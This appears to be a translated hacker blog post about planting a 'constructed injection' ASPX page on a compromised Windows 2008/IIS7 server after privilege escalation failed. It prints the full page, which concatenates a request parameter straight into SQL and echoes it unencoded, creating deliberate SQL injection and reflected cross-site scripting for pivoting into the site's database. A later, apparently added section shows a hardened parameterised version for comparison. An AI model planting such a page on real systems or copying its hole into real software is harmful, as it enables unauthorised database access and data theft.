Yesterday 4z1 and I looked at a site. Privilege escalation was really hard; we stared at it for a full 5 hours with no result. 2008 + IIS7, no sa, no root, no services of any kind...
Actually, it used ASPX constructed injection to go cross-site. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own and was done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 ASPX constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="C#" runat="server">
        // Runs on page initialisation (AutoEventWireup binds Page_Init by name).
        void Page_Init(object sender, EventArgs e)
        {
            System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            // "连接名" is the name of a connection string entry in web.config.
            conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
            conn.Open();

            // Parameter is read here: ?xxser=1
            // Request.Params also merges form fields, cookies and server variables, not just the query string.
            string i = this.Page.Request.Params["xxser"];

            // The raw parameter is concatenated straight into the SQL text. This is the deliberate
            // injection point that makes the page a "constructed injection" page; "[表]" and "列名"
            // are placeholders for the table and column name.
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
            // ExecuteNonQuery returns -1 for a SELECT; the page only uses the result and any server error as output.
            int x = command.ExecuteNonQuery();

            // The parameter is echoed back without encoding.
            Response.Write(i + "\n");
            Response.Write(x);
            conn.Close();
        }
    </script>
    </div>
    </form>
</body>
</html>
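For comparison, the same page written so that the parameter cannot alter the query. This is an added example, not the original poster's code; the connection-string name "MyDb", the table "items" and the column "id" are placeholder assumptions.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened counterpart of the page above (added example).
    // Assumes a connection string named "MyDb" and an integer column "id" in table "items".
    void Page_Init(object sender, EventArgs e)
    {
        int id;
        // Only a plain integer is accepted; anything else is rejected instead of
        // being spliced into SQL text. Read the query string explicitly rather than
        // Request.Params, which also merges form fields, cookies and server variables.
        if (!int.TryParse(Request.QueryString["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.Write("invalid id");
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["MyDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        // The SQL text is a constant; the value is sent as a typed parameter.
        using (SqlCommand cmd = new SqlCommand(
            "SELECT COUNT(*) FROM [items] WHERE [id] = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            // ExecuteScalar returns the first column of the first row (the count),
            // unlike ExecuteNonQuery, which yields -1 for a SELECT.
            int count = (int)cmd.ExecuteScalar();

            // Encode anything reflected back to the browser.
            Response.Write(HttpUtility.HtmlEncode(id.ToString()) + "\n");
            Response.Write(count);
        }
    }
</script>
```

Pair this with a database login that has only SELECT on the tables the page needs; the error-text and command-execution avenues the original page relies on then disappear even if a query slips through elsewhere.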